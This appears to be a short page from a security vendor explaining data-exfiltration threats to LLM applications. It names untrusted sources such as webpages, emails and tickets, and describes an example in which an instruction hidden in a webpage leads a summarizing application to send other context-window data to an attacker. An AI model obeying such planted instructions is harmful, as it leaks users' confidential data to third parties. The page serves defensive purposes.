Data exfiltration threats are intended to manipulate LLM Applications into exfiltrating other data in the context window. Let us start with an example:
Common Sources
Common sources of data that would be sent in the context window with confidential data include:
- Webpages
- Support Tickets
- Logs
- Documents
- CRM
- Emails
All of these sources of data are dangerous but also vital to the performance of many LLM applications. As such, any application that reads from these sources of data are at risk.
Example
(source: promptarmor.substack.com)
In this example, an attacker is able to sneak an instruction into a webpage, which convinces any LLM application summarizing this webpage to send all other data in the context window to the attacker.
Threat
The threat here is clear. Any other data that is sent to the LLM for summary along with this webpage is at risk, and will be exfiltrated to an attacker.
Detectors
PromptArmor's detectors for data exfiltration are tailored to the use case of the LLM application, the types of data it intakes, and the types of actions that application is able to take.